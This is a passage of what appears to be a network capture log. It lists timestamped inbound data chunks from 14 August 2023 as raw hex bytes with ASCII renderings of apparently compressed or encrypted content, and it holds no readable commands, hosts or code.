aa a4 2c 94 dc 08 65 62 2a 11 2c 97 c3 1f 6d 0e Data Ascii: 9h5>dxFB!h,C{57 >G7xR^DO&sv],~cx}(f~,_k{tW?*c\|NmQ,`#<u/oGMIj\lHhB=="QPLk,eb*,m
2023-08-14 11:02:43 UTC	56	IN	Data Raw: 59 65 d5 54 79 9d ad 21 06 bd ad b4 2a 70 78 85 06 95 db 0f 8d 49 cb 98 a2 0f aa 23 98 c3 8b 72 29 1e 54 73 17 bd d5 ec 82 3d a3 35 17 f2 b8 f5 b8 86 40 e2 b2 8b b9 c4 ae a4 c6 55 99 bb da a5 b2 07 34 1e d8 4a dc 1a 78 2f fc 31 89 dd 31 ed d4 ef 69 d8 60 b7 6c 45 01 06 94 c7 6e a4 59 2a 7a 28 84 2a 47 72 06 a4 23 d4 ca 53 e6 4d 8e 29 cf 5b 79 6a 26 48 fd f8 4a 91 ca 36 b7 24 e5 3b 03 db b4 e2 0b 77 1b 61 00 c4 0e 8b 86 c6 0f ef e7 70 39 36 c3 2b f4 eb ce 4f 55 3e 2c 8e 58 a5 7b 69 8a f6 47 e7 4c c7 56 13 7b b3 e1 62 4d a9 77 58 c1 a1 6e ae 77 c9 b0 7d cd 3d be 64 a3 55 76 75 74 5c e6 8c 3c dc e7 65 9e 44 6c ee 93 96 aa 06 d2 9a 4f f2 cc aa 63 eb d5 5b 31 45 d7 ae 29 7f 0d 02 03 ba 94 77 f3 1a 9d 3b 73 aa 99 51 4f 62 a5 06 d9 52 eb c4 c7 7c 4a dc c4 da 0e Data Ascii: YeTy!pxI#r)Ts=5@U4Jx/11i`lEnYz(*Gr#SM)[yj&HJ6$;wap96+OU>,X{iGLV{bMwXnw}=dUvut\<eDlOc[1E)w;sQObR\|J
2023-08-14 11:02:43 UTC	57	IN	Data Raw: 91 de ad b5 ef a1 72 ac 19 3b 6a 28 7e 10 bd 99 04 b4 96 e6 13 59 ad 28 7c ba 6d 46 35 9e d2 6f 97 55 63 20 af 4e 5e 13 fa e8 38 9a 59 8d a5 3b a0 3e 55 dd 2a 1c 68 af e1 0e 35 a4 10 0e 70 fe eb ca bb 5b 71 35 2c 84 65 a0 ce 1c 7c 4f 5b 5a 2a 92 f9 5d 4e 2a 7d 2c 01 b3 8e 84 67 84 08 35 43 b1 ce b4 bf f9 d2 f9 94 7d c5 4f fc 3a 11 7d 44 fd f1 3e f9 d7 f1 1f 86 5e 33 34 39 db 81 38 d5 b6 2a e4 9d 29 7a 5a 8c 19 82 f6 18 f9 19 64 9c 76 31 b7 78 e2 78 72 5f e7 b2 41 fe b8 fd f9 0b 4b 0a e5 67 63 5c 92 6e cd 05 b1 8b 32 3f 6b 2f 95 b2 e8 3e 72 46 46 3b 7e c9 3c f2 06 62 71 82 dc 56 c8 29 70 57 a4 89 cb 9c 85 50 44 a1 1d 3a dc 0e c6 07 a4 89 46 02 c3 3c a8 30 12 b9 9b cc 1e 9f 58 96 7a d4 48 dd d4 1b 49 5c b6 77 b5 97 e0 2f 02 d3 75 71 5a 86 3e 66 73 a1 b6 c0 Data Ascii: r;j(~Y(\|mF5oUc N^8Y;>Uh5p[q5,e\|O[Z]N},g5C}O:}D>^3498)zZdv1xxr_AKgc\n2?k/>rFF;~<bqV)pWPD:F<0XzHI\w/uqZ>fs
2023-08-14 11:02:43 UTC	58	IN	Data Raw: 0a 7d 59 dd 62 77 cd bc c4 0b 63 45 80 b4 89 12 e7 f3 7f e1 c2 1a 29 95 22 10 b8 f3 e5 f0 07 0f 1a 18 20 9f f6 c5 1b d7 a2 1f 71 58 2f c8 5d 3f fb 47 37 d6 ff f3 12 f4 f9 36 60 02 b1 96 31 7d 7a b5 24 ff 21 0b 48 a7 00 ce 4a 34 1e 3c 84 b5 0f 44 00 58 e7 4c 7c d3 57 7c 01 f8 7a d9 ad b7 05 11 6d a7 68 9c e3 74 6b 57 a0 e5 0b 67 ec 3d f5 84 47 8c dd be e7 d8 59 fa e8 7c 7c b7 9f 52 ec f5 b5 ad 3f e2 fa 80 0a b5 da db df 2e 87 eb 0f ea 0e 06 8c fc 1a 93 3a e9 bf f8 ee 91 ad 45 ff 59 63 af 61 f2 51 df c8 13 38 8c 25 f0 b4 b0 53 9f f5 c5 55 b6 8e 4f 45 7e 80 e8 ac 0a 83 c7 29 9f fd 1f 96 7f 7b c7 23 aa a6 7a 3a e0 b8 d3 52 87 12 18 3c 0b f6 92 a2 d3 78 86 dd 35 5a 07 62 85 20 40 09 88 68 c7 92 4b ff a8 eb c8 08 3c ac ec ac 81 20 e5 e7 fa 6a ad 21 e5 11 bb 4e Data Ascii: }YbwcE)" qX/]?G76`1}z$!HJ4<DXL\|W\|zmhtkWg=GY\|\|R?.:EYcaQ8%SUOE~){#z:R<x5Zb @hK< j!N
2023-08-14 11:02:43 UTC	59	IN	Data Raw: 47 72 1f 51 a3 e8 95 a4 be b3 9f b0 76 26 a5 3e 4f db 96 e9 8a 84 53 bb 15 b5 7d 02 dd ac 37 a6 73 a6 6f 92 48 b7 3f 92 6e 77 6e c7 0f 8b cb 25 be 2e 07 45 5c 89 20 1c 47 0c e6 fb 78 d4 15 18 6e 09 73 db 6a 01 05 65 d7 f0 a2 9d fd ab 89 b1 c4 c4 8e 03 cf dd 54 1e 41 89 9f e3 f4 6b ca 7c fd e0 45 b9 bd 41 94 e4 ff a8 1c fe b0 e1 14 c4 c5 6f 0c 5e b4 f1 3b 94 08 8c 83 d1 66 26 f5 95 79 ac 13 5d 12 27 eb cb d9 bd dd f3 c6 73 f4 0a cf 73 13 14 e8 ab 62 86 0c 09 0d d8 c0 3b 89 1f 1c b1 5f a0 68 f5 9b f1 51 4a 77 d1 78 9e 90 e2 e3 ad 81 3f 27 68 c4 37 fe 57 c8 ed 97 3d 61 a5 72 6a 95 5f 66 c2 50 d7 6b 37 62 01 af 72 ab 0b d7 a3 5f 1a c7 07 6f b6 b4 d5 00 56 53 44 48 18 77 be 5c 58 06 3f 56 92 e7 81 e6 ce 1c 9c 40 70 f9 48 16 46 50 0d 4f ca 6a c6 d3 f8 cb 00 18 Data Ascii: GrQv&>OS}7soH?nwn%.E\ GxnsjeTAk\|EAo^;f&y]'ssb;_hQJwx?'h7W=arj_fPk7br_oVSDHw\X?V@pHFPOj
2023-08-14 11:02:43 UTC	61	IN	Data Raw: 30 82 f5 ca 23 de 11 40 0e 4b 1e 51 d4 f2 ae 4a 56 fb ad ae 5b ed bb e2 1a b1 d3 42 6c 4e 74 e1 cb 15 2a 20 2e 1f e6 65 55 34 1d 5d fb 3f 8c 0e a8 f4 47 e6 22 55 b8 d8 dd 14 22 81 c8 ef 44 48 6c e0 d4 cd c4 3d a1 db 18 34 50 19 d0 ac 41 b0 74 80 b7 93 96 08 6c 2e 5b c3 1f 4a c7 72 dd d5 68 a1 ae 0a 59 97 16 76 de 58 fc 53 31 96 65 c9 6f fd 02 c5 0b f9 e1 67 84 7a 12 ba d0 8f 99 2e 5a bf 2c d4 88 95 9e 72 d8 5b 40 cd 01 ca 9b c3 50 50 99 17 3b df fc 37 b0 31 21 3a bb 8e 31 82 79 85 a7 1b a7 ef 26 d5 b7 78 fb 8c 52 b5 4a 46 fc 30 00 c8 a5 f7 6b a6 ec dd 0e e8 02 be 1f c3 b0 e2 2c 98 09 8e 18 13 f0 1d 3a 5c d7 66 01 77 3b 7b 37 67 3e 27 f1 fa a2 62 72 26 09 e0 d4 33 1c 6a 4c bb 91 42 1a 6e 68 d1 a1 d9 8d f5 04 06 3b 33 ca bc bb d1 b4 fa cc 47 7e be b7 bc 38 Data Ascii: 0#@KQJV[BlNt* .eU4]?G"U"DHl=4PAtl.[JrhYvXS1eogz.Z,r[@PP;71!:1y&xRJF0k,:\fw;{7g>'br&3jLBnh;3G~8
2023-08-14 11:02:43 UTC	62	IN	Data Raw: 60 37 03 33 82 6a 78 4c de 38 99 f1 3f 63 c9 e1 56 63 5f 17 6d 55 cc 7e 84 95 2e ba ef f0 1a 60 d1 bb c5 58 63 4b 5c 63 53 54 db e9 da 5e 67 8f 9f 22 06 e3 61 ca 1b 49 7c ab aa 79 ee 97 a5 5c d1 76 ab ce 65 5c b7 b4 ff 33 04 80 a1 0f 14 e1 6f e1 28 13 32 e2 cf 77 29 61 04 49 78 09 00 26 e0 fb 52 d3 3f 6e 46 cf ff 29 ea a6 4e ae b0 05 84 af 47 ab 95 5f d7 45 72 19 6d fb 0b 40 46 c4 d9 c3 18 e9 73 48 2a b3 ee 1e 04 00 2d f6 24 4b bd d8 8b bd ec 4a d1 91 98 e0 9f b4 2d 96 d7 50 58 b6 c3 78 38 a4 e9 55 a5 f7 66 bc 20 cb a0 e7 47 1a 01 6d 04 3d 13 aa d9 75 4a 35 91 c9 63 94 79 10 46 3d 28 f9 61 77 12 17 66 d0 bf cf 31 f5 33 e0 ae 85 b5 ad 3a 00 ef 96 2d ae 4d e0 39 27 74 dc f8 74 db 37 35 31 fa 2f 89 c3 54 34 6c 71 61 50 67 61 e0 34 29 29 1a ae 59 21 90 4f 58 Data Ascii: `73jxL8?cVc_mU~.`XcK\cST^g"aI\|y\ve\3o(2w)aIx&R?nF)NG_Erm@FsH*-$KJ-PXx8Uf Gm=uJ5cyF=(awf13:-M9'tt751/T4lqaPga4))Y!OX
2023-08-14 11:02:43 UTC	63	IN	Data Raw: 9c e3 ac 21 53 e9 fe 36 69 bb 84 ff 09 19 e8 a5 bc 0c c3 90 41 01 b5 df 71 14 38 78 57 da 48 10 31 8f e4 e7 31 b3 66 97 99 b8 17 8f 16 f3 a0 d5 0d 94 69 31 30 61 85 0a f8 70 73 b5 db 3e 82 80 0e 87 f7 94 b5 f3 9e a9 2e 27 5a a1 f5 2c 29 4e 02 cd 69 f9 e2 35 d1 33 81 fe 28 7d bc 4d 94 a0 44 76 f6 66 14 d4 c0 6e 57 77 50 30 b3 3b 02 0d ae 81 cf bd 3e 3f 3e 95 9b 2d c7 ba 7b db 91 d3 15 08 83 7f 56 7e ff 24 ba a8 1d eb 18 3a bc 9d 88 ae 72 c6 18 c0 e3 49 ed 00 ce 6a ea c7 e6 a6 33 6e 0c 91 1f 6b 0d 75 55 6c 6c d0 7d a5 10 6d aa ef 12 10 6f ea 90 79 80 f9 c6 4e ab 56 23 14 05 9e 04 76 11 ad 35 3d 41 8b 76 44 1c dc c4 e5 23 4d 66 a6 8f f6 39 0f ad e0 93 25 cf 3b 6a 74 b8 fa e6 df 1e c3 9f 1b 0d 82 34 eb e1 42 44 be bb e8 6b 4e 2a dd 34 f6 f9 d4 96 2b bb f0 23 Data Ascii: !S6iAq8xWH11fi10aps>.'Z,)Ni53(}MDvfnWwP0;>?>-{V~$:rIj3nkuUll}moyNV#v5=AvD#Mf9%;jt4BDkN*4+#
2023-08-14 11:02:43 UTC	64	IN	Data Raw: 85 1a ec a8 0d 1e 0c 43 34 2b a7 6f bd cf 66 12 67 f6 45 11 df da 41 2b a7 e7 fd f7 ae 29 8a 80 90 b6 90 72 19 72 9f de e0 9a f1 40 d4 8d e6 37 58 bb e4 97 aa d2 0e d4 66 d3 ee 79 df 20 a4 72 ae 76 ec 38 c8 79 ed a6 e3 e0 ce 16 87 43 20 5e 3f 12 14 d1 16 48 cf 37 75 28 8c 58 00 37 45 a6 0b d3 39 43 4c 61 93 9c 88 c7 60 b7 cc 1e aa 4b 1e c6 bf 80 85 d0 5a 43 3a d2 6b 15 39 f7 de 82 93 eb c6 e3 3a 96 13 ba 89 37 af f8 da 92 8a af 9b c0 a8 f9 3c b7 3b 01 8b 37 0b 19 37 15 c7 0b 18 f9 e5 fb 08 39 9c 16 7a 37 01 fb 48 d5 50 8b 3a 6c 58 df 80 5f ef 37 ec a3 42 1f 2a f5 fe 7c f9 9c 4d 49 c5 bd 18 68 bc e1 3d 7c 47 ff a8 ca b2 61 7d ee 57 63 2c 4e 27 6b 63 06 05 01 fc c1 73 4d c0 17 e7 18 37 65 2f bc c2 9c 3b c6 62 bd ac 94 bb 25 8e b8 07 63 23 d3 bc 04 23 4b 1b Data Ascii: C4+ofgEA+)rr@7Xfy rv8yC ^?H7u(X7E9CLa`KZC:k9:7<;779z7HP:lX_7B*\|MIh=\|Ga}Wc,N'kcsM7e/;b%c##K
2023-08-14 11:02:43 UTC	65	IN	Data Raw: 5b f5 4a f7 13 2a 04 ea 0c df 0e 0f 0a 2c d7 08 c9 f0 0f 3d d5 16 eb 3e 42 17 bf 3e f0 07 a5 fa f7 5c a9 9b 70 a9 b4 bf 49 ac 7b e9 2b 29 3e 2d 4b 44 73 c7 a5 67 67 7b 90 c9 bf cf 43 96 87 8b ea 49 8c 34 1b ce de b7 e8 14 1d 83 b3 29 9a 01 4a 05 2f 74 55 9c 39 19 80 87 49 99 5c 08 2f 35 Data Ascii: [J*,=>B>\pI{+)>-KDsgg{CI4)J/tU9I\/5
2023-08-14 11:02:43 UTC	66	IN	Data Raw: 31 b8 f1 71 38 3b f6 fa 02 2b d1 e6 7c e6 7d 1e 62 5c 1d 1a d2 64 b5 02 80 bc 1c 31 c8 b1 a6 da c2 cb b7 18 d1 76 ff a5 8b ea 45 b6 a0 cf d7 f6 f0 d3 d5 8c fa c4 36 34 ea f4 d6 83 c7 01 fa 62 2c ec 9b cc 38 96 58 ef 70 47 04 83 8d 46 c0 96 cf 65 51 6b 5c b2 ad 8b e0 a6 b2 f7 c5 c3 58 25 f3 90 a4 3d 47 a1 aa 0d 18 45 40 82 ff d1 34 40 63 88 d6 23 6b a0 58 70 e1 cb d9 3d d1 7f e9 f3 e9 5b 0c 5f 01 03 c2 16 4d ad ef 1d 4a e8 1f 38 fa 09 f5 24 83 80 89 6c 0b d7 62 53 0e de 0d 0b 37 10 a2 e6 42 d6 30 77 30 fd 99 a1 9b 89 ac d3 69 68 66 21 1e 34 15 31 ff 3d b2 46 f5 c2 b8 84 f0 de ff 5f a3 71 61 d0 60 bb 98 d9 02 cd b9 ea 37 bc 55 35 9b 46 89 fa 83 04 79 04 4e 8e db 9d 78 2a 33 ae 04 ef f6 0d 4f 45 26 7a b3 b4 4f 84 3c 7d b4 f3 59 2f ea 4d 63 e9 f2 b0 1d 91 00 Data Ascii: 1q8;+\|}b\d1vE64b,8XpGFeQk\X%=GE@4@c#kXp=[_MJ8$lbS7B0w0ihf!41=F_qa`7U5FyNx*3OE&zO<}Y/Mc
2023-08-14 11:02:43 UTC	67	IN	Data Raw: e7 09 7c 7d 22 10 f8 3b 8f 94 a8 44 c8 65 48 1b 23 f5 6d 9f 46 1d 75 75 79 ec 71 59 ac 2a 1a 93 c3 70 33 f1 60 be c6 2c e3 67 d8 ea 75 80 20 d8 60 f2 c7 cc df b5 37 33 ba a7 af a6 e1 50 9a 04 be 7e 1b 88 df d4 90 57 1c f6 98 f2 76 ce 55 28 e2 4e 95 38 8c e5 8c 02 5b 8d 25 97 7f 7b 53 30 5d 0c 61 e9 42 30 f0 7f 3d 46 64 e6 8a d5 b3 e7 11 20 a4 4e 16 7f cb e2 f9 32 d0 2a b1 65 82 b6 05 79 8b d6 f5 3f 10 fc 79 8f b0 2d e8 fb b4 e8 b3 f7 99 48 d1 28 82 b9 0c db a3 35 b4 51 4e 86 86 dd 62 9e d9 26 af a5 1a e6 f9 8b 56 b7 4e 25 98 65 61 a0 85 81 65 fc 10 4c 7f e5 17 e0 23 28 73 63 ec 99 48 44 af c5 5c f4 ca f3 16 59 93 10 66 10 23 7e 51 e2 cc 7a 35 0b 31 77 9b 84 b7 fb 7f 22 73 ef 4f 80 6b 75 ef 65 cd 60 dc 3d 9c 61 61 5b 17 0b 91 32 d7 54 4f 85 69 b9 ba 0b 02 Data Ascii: \|}";DeH#mFuuyqYp3`,gu `73P~WvU(N8[%{S0]aB0=Fd N2ey?y-H(5QNb&VN%eaeL#(scHD\Yf#~Qz51w"sOkue`=aa[2TOi
2023-08-14 11:02:43 UTC	68	IN	Data Raw: b6 31 f6 8d e8 42 ce 01 97 1a 14 1c 68 4d 9a fa 2a 25 ab c8 38 c1 a5 18 6d b0 5c 12 81 08 82 30 92 74 e4 a1 11 61 9d f0 7f 56 6a 33 3e 9c 8a 85 e6 1a 4f 43 c7 fb df 12 70 49 e5 97 5c 8c 11 e1 20 86 ad 43 79 4f 48 e4 cc 58 52 8b b0 c4 37 c1 88 bd 48 4f 3d 61 a7 4f ef 6f 12 f8 5b 80 3c 5e 08 dd a1 0a ad 76 f7 2b 5c a0 ac 09 21 f6 c0 f6 b1 db f5 a8 63 c1 ae eb 17 f5 cf 18 35 82 82 72 7f 71 0c f5 ad 18 b9 31 d5 d6 c3 d6 a5 ac 35 32 fa ea 61 77 25 91 a5 28 41 d2 df fe 65 c0 66 ae 04 40 19 c7 e0 ca 7b 4b 52 85 a2 5e e0 06 a2 ef 71 23 c9 a3 68 5e 4d 81 f0 06 09 e3 38 31 ed c6 35 01 28 a7 f7 ed 4f 40 f2 30 1d ca c6 fe 74 0b 05 6a 31 6c 09 58 78 c2 b4 6b d1 df 41 17 a7 67 2d 60 d3 ca 0a 11 e1 cc 83 17 72 af 13 80 16 70 43 14 da aa 23 6f 77 f6 71 89 ef c5 d8 3f c3 Data Ascii: 1BhM*%8m\0taVj3>OCpI\ CyOHXR7HO=aOo[<^v+\!c5rq152aw%(Aef@{KR^q#h^M815(O@0tj1lXxkAg-`rpC#owq?
2023-08-14 11:02:43 UTC	69	IN	Data Raw: 08 7e 09 01 e0 df 04 bc 67 c4 18 35 7e 40 65 89 a0 39 d6 e1 8b c0 ca ea 86 5f 4d fe 53 f0 5d 9d fd bd e7 9e 5b 99 c0 b3 98 dc 98 05 3c a8 b9 05 22 04 9d b9 87 d2 4a 3c d2 0f 99 bf dd 50 6f 5a e9 12 29 38 5a 86 a8 29 5e 2f 2b d3 c6 cd 7b 5d c5 28 e4 87 2e 7b f5 d1 a2 4a 01 7f 48 74 2c fc a6 ee 15 34 3b cf 10 e5 f1 e4 0d 5f 28 16 63 d4 14 6b 17 d7 e3 c3 2c 4c da 43 a7 08 34 08 ee 31 e8 13 ca 08 58 b1 11 ae 98 fa dd 72 1d 13 6f 23 e5 c3 a0 18 d1 a5 98 b9 cb ef 4f 5b 29 6d 82 cf 83 40 0b 27 fa 9a 83 4d f9 37 22 eb 5f c0 48 96 5a f8 ac 75 7f 0b 60 39 15 75 e3 9f de 6b 16 4f 41 9e 2c 4f 91 a6 43 d9 ff 61 c7 cf 51 cf 41 77 f3 28 43 fb ca 95 99 ea 27 ac e3 c2 5a 0c 20 e9 ec b9 56 c8 c8 92 05 5e 18 9c 4b a4 d8 47 81 8c ae cc 6c 7e 8e 30 a9 c6 54 a0 df 35 e6 d8 6a Data Ascii: ~g5~@e9_MS][<"J<PoZ)8Z)^/+{](.{JHt,4;_(ck,LC41Xro#O[)m@'M7"_HZu`9ukOA,OCaQAw(C'Z V^KGl~0T5j
2023-08-14 11:02:43 UTC	70	IN	Data Raw: 02 69 76 5d d2 df f1 fc dc 75 6b cb f7 b6 87 68 bb 0d e6 7c e5 c5 71 00 55 40 05 53 4b 2a b3 55 12 38 95 f8 c4 58 3c 65 49 b8 08 b4 83 bb 32 bb 86 74 40 cc 93 2a 50 7c b8 48 3d c2 17 a4 76 88 d4 3d 5a 3d 52 bb 8d 4d 15 83 13 03 4b a9 10 80 77 24 6b fb 3d b4 bb b8 20 9f 90 e1 fe 17 c5 80 71 85 9d bc a3 5f 49 22 8a 2a f8 73 e8 e4 a7 b0 eb b1 6e 08 e8 ba 27 e5 45 f2 f5 0d 5c 9d 2e ab 30 02 40 80 b2 df c9 4d b5 02 04 bb 37 58 5c 7f d8 57 24 9c c7 4d 53 f4 69 90 14 fc e5 08 2b 80 72 15 fe 81 d3 5f 20 2b 6c 45 eb c1 b2 cc 54 b1 1d 69 d7 5d de e4 b8 96 40 4e 46 70 16 d3 16 e6 61 4a 35 d2 a0 0e ee 4f 39 c0 c7 fd 51 6f de 65 b3 ce d3 84 ee f4 5d 14 7c 0c 72 15 8c 07 7f 32 cd 7f 16 5f 9e 60 68 f3 79 26 34 93 6d 04 ce b3 26 69 13 80 c7 81 d2 a2 38 78 cc eb bb 68 78 Data Ascii: iv]ukh\|qU@SKU8X<eI2t@P\|H=v=Z=RMKw$k= q_I"*sn'E\.0@M7X\W$MSi+r_ +lETi]@NFpaJ5O9Qoe]\|r2_`hy&4m&i8xhx
2023-08-14 11:02:43 UTC	72	IN	Data Raw: 16 5d a6 c1 81 2d 99 f8 5e 7a a4 0e 49 8c 32 15 47 dc bd e2 05 24 f2 ab df 73 80 23 01 d3 fd b3 09 b9 e3 39 77 24 fb c3 1d b1 74 9f 4f 94 d2 d2 a5 44 b2 fc 65 35 b9 48 5f d3 3c 29 5f 98 fa 30 25 a0 6d d9 4e e1 2a 07 6d 76 73 f6 9c 5e 5d ea 60 2b b9 de 68 74 18 8c 88 12 55 23 16 35 48 a4 0a 09 c9 10 b7 47 29 07 82 36 9b 33 a5 13 33 51 1b c9 5b 9f 38 91 14 dd 4e b5 bf 1e 78 4d 6a 7a c3 62 ef 63 61 7d cc 01 9f f8 0e 85 4d 44 0a 8b 62 4a 17 d1 2e 84 4c cc 2d ad f6 78 bb 52 20 31 58 da 6c b3 ef 39 28 53 0c 57 1d 56 b7 3e f6 84 af 78 2c 75 ae fe f4 69 45 5b 0e 36 42 d4 6f 54 ef d1 64 4e 73 6e 60 6c 28 6a 74 5e 29 bc 95 52 78 89 8d 85 76 74 25 a8 6c 12 21 69 c1 58 db de f1 7c a2 fc 80 7c 0d 02 50 63 97 60 1a a7 38 d8 4b dd fe ea 37 cd 9c ae e4 ab 55 7e e8 22 55 Data Ascii: ]-^zI2G$s#9w$tODe5H_<)_0%mN*mvs^]`+htU#5HG)633Q[8NxMjzbca}MDbJ.L-xR 1Xl9(SWV>x,uiE[6BoTdNsn`l(jt^)Rxvt%l!iX\|\|Pc`8K7U~"U
2023-08-14 11:02:43 UTC	73	IN	Data Raw: 96 a6 b9 84 f1 21 59 84 e9 73 b2 ee ec d4 f7 3a 06 33 2c ba 1b 61 38 ba 30 68 d6 0a e0 33 76 b8 d6 ea 40 fd 1b 37 5d a7 55 24 14 6d 71 27 22 ce 8a f6 47 95 73 24 47 99 48 91 37 4d e7 a5 a2 7d 67 77 41 33 22 80 ab 30 d7 a9 5d 47 ea 40 37 66 f1 7f a5 9f 53 c7 a8 67 18 4f bd f9 53 96 aa 36 ce a4 ac f9 70 45 af 6c 51 5b 31 55 ff a2 c4 6a 9d ed cf 31 04 65 22 31 e8 96 d6 de a6 c8 9f 7e c2 4b e8 82 44 d7 42 84 bb 5a 1d 02 fd f3 b3 46 09 3f 93 12 35 ab 48 03 85 5c d0 8e 18 db 97 eb 8a d7 ac 0e e9 b2 23 43 35 bb a8 8d b8 33 90 ae a1 5b d3 58 05 0d e3 d3 b8 89 7c 84 01 26 64 75 64 b5 8a c0 43 40 6f 3c d1 d5 97 81 53 9c ed 7a 75 8e b4 ce c5 69 d4 5b e5 c3 5c df a2 4d 4b 8d e4 ec 4c 29 73 87 98 33 db a3 f4 93 f9 59 51 75 82 72 ab f6 2c 87 80 f8 b0 e5 14 c4 0d 77 94 Data Ascii: !Ys:3,a80h3v@7]U$mq'"Gs$GH7M}gwA3"0]G@7fSgOS6pElQ[1Uj1e"1~KDBZF?5H\#C53[X\|&dudC@o<Szui[\MKL)s3YQur,w
2023-08-14 11:02:43 UTC	74	IN	Data Raw: 20 d1 a6 4d 87 a5 ee 3a 3a fc 7c f0 17 75 02 f4 b0 92 27 78 e8 9b 53 2f 64 f2 fa 0a d8 aa 9c 54 47 93 ad 39 b9 cb 4a 72 03 bc 15 8c d8 e9 c7 74 d2 04 55 b4 3a b0 6a 6b 66 93 7d b4 2f 59 ef 18 8f e0 4b c8 57 38 db ef f0 65 19 26 bb 0b f1 df cf be d9 69 93 3e ff 61 dd 66 49 c5 94 84 0d 29 b3 e1 8e 1a f8 ad 36 3e 1c 31 46 d1 fb 92 04 63 d2 67 b4 9c 97 c6 36 77 59 0c 2b b1 05 03 ee d9 78 d6 65 e5 e8 00 c7 aa e1 1f 8f c4 82 f5 57 67 db d9 78 4d 0f b3 f6 c8 6a 32 a1 4d de f5 f2 f0 66 69 31 ba d9 6c 19 ae de 79 b6 b2 92 45 2e fb fc 8d 3d c2 c0 21 bc 51 b6 48 2b 9b cf ad de 90 3b 59 05 ac 7a 81 3f 81 4e c5 cf e0 81 c0 b2 12 72 a2 86 f4 d9 95 9c e4 67 c4 19 84 d5 4c 4e 22 fe 50 06 b3 74 53 5c f3 b0 bc dd 9b 60 e9 f3 83 9c 40 bf da d4 f1 cf e8 1a ed e7 12 c4 c1 63 Data Ascii: M::\|u'xS/dTG9JrtU:jkf}/YKW8e&i>afI)6>1Fcg6wY+xeWgxMj2Mfi1lyE.=!QH+;Yz?NrgLN"PtS\`@c
2023-08-14 11:02:43 UTC	75	IN	Data Raw: 64 9c d3 1f f7 4d 3f 9b 12 b4 e5 c1 69 7a d3 f9 1e 07 76 52 f2 76 18 00 d9 cc cc b7 12 4b 53 9c bc 63 12 2c 1e e0 a3 14 da 57 60 20 ec 40 e8 cb 71 2a a1 d1 c8 72 69 73 c5 23 9a a7 97 ba ac e3 68 84 55 b6 91 4e 40 78 c8 e5 a8 c3 29 b3 9c 95 e6 ac 68 38 f0 d1 6d aa 9f d6 17 86 54 bd 26 8b d2 79 0b 51 e4 1e 18 64 3c 07 8c 3b a8 62 e7 dd b5 62 67 57 c5 f6 d1 de 41 4d a6 95 45 a4 b2 b7 9a 83 ba c7 a0 9a d0 09 12 3c be a5 2f 13 14 d8 d1 10 47 61 1d c8 a9 0e 00 e9 72 4d 50 bc f2 d5 96 84 11 1b 0e 6d 4e 10 07 12 e5 55 d5 27 07 1d 87 09 f8 dd fa 61 d5 74 53 33 8e 3d 79 17 02 f2 76 ac c8 d7 64 5f 3f ae 10 96 b2 aa 3b 76 61 21 d2 73 34 a4 c3 2a ff 15 27 20 c5 6c ef 92 76 9a 66 59 ce c8 b0 1d aa a5 e9 56 95 fa 58 c9 ea 0b 38 94 cc be 61 e7 d7 2d d7 d2 cb c7 e1 f4 1e Data Ascii: dM?izvRvKSc,W` @qris#hUN@x)h8mT&yQd<;bbgWAME</GarMPmNU'atS3=yvd_?;va!s4' lvfYVX8a-
2023-08-14 11:02:43 UTC	77	IN	Data Raw: 52 83 b4 68 39 e1 53 2a f9 d8 31 c8 2a f3 f0 31 ba f4 de 03 de 11 2c 08 05 8f d1 7b 76 be a2 05 69 74 57 3c 9d d0 85 8c e4 52 2f 97 ec 20 aa b3 32 21 68 7e 18 c4 8b b7 cc 09 04 89 99 60 2b c0 f7 45 51 d7 53 c8 a8 de 55 1e 1d da cd a8 e7 d7 46 ed 82 7f ad 20 07 c8 62 8b d9 04 6b 13 7f 0a 48 e0 53 8c f6 bc f5 a1 7a 69 d8 30 ab 9d e2 34 bb 58 15 a2 90 d4 f0 f0 e7 6b 89 6f dc 0e a2 ee cf 93 56 95 af 4a ec fc 54 ee 49 7a 95 84 28 29 53 e9 94 65 6c 05 f1 2f 3a c2 7c f2 f0 e3 ab ae 9f d9 85 76 4d 03 d3 4c a8 a5 20 84 15 99 b2 e7 d6 6c cb ca 64 42 b4 29 b6 23 6b 42 bb fa c7 9b 44 0e c2 f2 65 e3 50 0b cc 22 db 5a d0 25 3e 59 b0 cf bc 78 19 47 aa da e1 2d 43 4f 95 47 6a 19 d7 82 5e 72 69 ad 51 ea bc 39 06 f9 77 f2 5a 96 a5 f9 3b 27 57 c9 93 2d 54 ae c1 a1 9e e7 27 Data Ascii: Rh9S11,{vitW<R/ 2!h~`+EQSUF bkHSzi04XkoVJTIz()Sel/:\|vML ldB)#kBDeP"Z%>YxG-COGj^riQ9wZ;'W-T'
2023-08-14 11:02:43 UTC	78	IN	Data Raw: c4 24 58 7e 40 8e 2d 39 fd 16 b9 82 f1 73 fd 2a 63 b2 e9 36 08 be e7 57 c9 60 3a 82 f1 b0 6f 80 35 d7 9c 4a 5f 3b 39 9c 72 72 d1 f7 0e 80 49 a5 b1 f8 9f 75 2a 6f 1d 27 c6 05 95 3c f0 59 fd df 9f a1 a9 99 77 01 79 e2 80 f3 47 a5 b8 fc c6 c2 bc 16 09 c3 7b 8a 20 0f c4 09 9e 60 2e f4 ef cc 95 01 e2 d1 b5 1d c7 bf 95 40 80 e6 d4 97 54 cd d9 63 2f 4e 84 8b b4 a5 ed bf 04 e6 00 14 43 67 ac be 0e b6 99 68 25 d7 83 ef 2d 95 10 a2 f8 bf fc 97 49 bf 34 6d 0f 9e d3 66 5f ea 65 f6 16 f9 bd 19 eb 5f 12 83 d5 77 04 29 8a 0b 3f 8c a7 7d 9d e0 12 5b d0 36 58 d5 84 b9 b0 98 c5 72 4c 01 cd f8 c2 51 e6 bf 77 79 4a ab 2c 19 d8 99 97 1c 3f ac 89 2b 34 d0 62 01 10 8b a5 36 92 05 5e b7 64 32 7c 0c 9a 81 d6 7d ad c5 a6 13 8e 1f 84 c3 d5 f8 93 ee 75 07 46 d6 79 10 0c c3 5a c4 cb Data Ascii: $X~@-9sc6W`:o5J_;9rrIuo'<YwyG{ `.@Tc/NCgh%-I4mf_e_w)?}[6XrLQwyJ,?+4b6^d2\|}uFyZ
